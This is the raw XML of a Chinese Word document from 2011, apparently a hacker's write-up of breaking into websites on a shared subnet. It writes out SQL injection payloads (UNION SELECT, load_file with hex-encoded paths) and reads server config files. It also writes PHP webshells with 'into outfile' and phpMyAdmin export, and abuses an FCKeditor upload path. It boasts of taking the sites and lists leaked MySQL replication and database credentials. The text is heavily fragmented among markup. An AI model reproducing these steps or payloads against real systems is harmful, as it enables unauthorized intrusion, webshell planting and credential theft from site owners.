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目标网站：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hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008864EC">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
            <w:color w:val="336699"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>www.1xx.net</w:t>
        </w:r>
      </w:hyperlink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目标踩点：ASPX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基本表面没有注入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貌似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有个表单有注入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只不过不太会利用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所以只能用笨方法C段试试了。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百度没有收录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谷歌没有收录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貌似是单服务器。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———————————————————————————————————————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以下是C段某个网站。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5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008864EC">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.xxxxxx.com</w:t>
        </w:r>
      </w:hyperlink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粗略的看了下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br/>
        <w:t>PHP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里面有论坛等等。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宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3762375" cy="552450"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="145" name="aimg_217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73" descr="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看一下商店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貌似是自己写的。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发现一个注入点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7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008864EC">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.xxxx.com/coma.php?fd=36</w:t>
        </w:r>
      </w:hyperlink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着重讲解下思路吧！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8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008864EC">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.xxxx.com/coma.php?fd=36</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008864EC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’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没暴出路径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9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008864EC">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.xxxx.com/coma.php?fd=36</w:t>
        </w:r>
      </w:hyperlink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order by 2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10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008864EC">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.xxxx.com/coma.php?fd=36</w:t>
        </w:r>
      </w:hyperlink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AnD 3=5 UNIon SeleCT 1,2—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11" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008864EC">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.xxxx.com/coma.php?fd=36</w:t>
        </w:r>
      </w:hyperlink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AnD 3=5 UNIon SeleCT 1,user()—-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ROOTROOT@localgroup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莫非是ROOT权限？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下边开始找目录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初步判断是为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*UNIX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系统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然后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读取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/etc/httpd/conf/httpd.conf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发现有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继续web目录:/var/www/html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发现有。  好了发现web目录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直接ysql.user into outfile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br/>
        <w:t>'//var//www//html//admin//commo.php'—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直接上传小马  一开始直接上传到跟目录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发现不行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。。后来试了几次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发现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admin有权限写入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OK。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可以开嗅叹了。。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我发现我真没什么写教程的天赋。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Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2209800" cy="1247775"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="146" name="aimg_217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174" descr="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成功拿下。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算了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拿几个文章凑下吧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======================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lastRenderedPageBreak/>
        <w:t>[boot loader]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timeout=30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default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS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[operating systems]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multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect /PAE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http://www.xxxx.com/admin/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X C:\Program Files\Apache Software Foundation\Apache2.2\LICENSE.txt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http://www.xxxx.com/cdddea.php?ad_id=506 and 1=2 union select 1,2,load_file(0x633A5C77696E646F77735C6D792E696E69),4,5,6--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c:\windows\my.ini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==================================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http://www.xxxx.com/phpmyadmin/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==================================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master-host=210.13.96.10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log-slave-updates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master-user=westingarea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master-password=k0n0d8o8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master-port=65432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http://www.xxxx.com/admin/include/app.php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以下四个数据库选一个，密码都一样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&lt;T&gt;MYSQL&lt;/T&gt;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&lt;H&gt;localhost&lt;/H&gt;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&lt;U&gt;asfdad&lt;/U&gt;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&lt;P&gt;asdfasdf&lt;/P&gt;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hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008864EC">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.bbbb.com/fckeditor/editor/filemanager/browser/default/browser.html?type=Media&amp;connector=http://www.bbbb.com/fckeditor/editor/filemanager/connectors</w:t>
        </w:r>
      </w:hyperlink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/php/connector.php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/var/www/html1/xxxx/phpmyadmin/phpinfo.php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SELECT * into outfile '/var/www/html1/xxxx/appt.php' FROM `xy`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讲解下思路  同样的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*INUX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系统  只不过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这个不支持直接into outfile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008864EC" w:rsidRPr="008864EC" w:rsidRDefault="008864EC" w:rsidP="008864EC">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="315" w:lineRule="atLeast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8864EC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后找到了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PHPMYADMIN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br/>
        <w:t>直接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找帐号密码登陆  登陆以后写入一句话</w:t>
      </w:r>
      <w:r w:rsidRPr="008864EC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008864EC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>导出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00337628" w:rsidRDefault="008864EC" w:rsidP="008864EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008864EC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>俩站的 SHELL都是这一类方法。。我不适合写教程。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00337628" w:rsidSect="00337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F6731"/>
    <w:rsid w:val="00337628"/>
    <w:rsid w:val="005F6731"/>
    <w:rsid w:val="008864EC"/>
    <w:rsid w:val="00C27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6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8864EC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008864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64EC"/>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008864EC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864E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64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2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xxx.com/coma.php?fd=36" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.bbbb.com/fckeditor/editor/filemanager/browser/default/browser.html?type=Media&amp;connector=http://www.bbbb.com/fckeditor/editor/filemanager/connecto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xxxx.com/coma.php?fd=36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xxxx.com/coma.php?fd=36" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xxxxxx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xxxx.com/coma.php?fd=36" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.1xx.net/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xxxx.com/coma.php?fd=3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2011-10-28T11:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-10-28T11:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>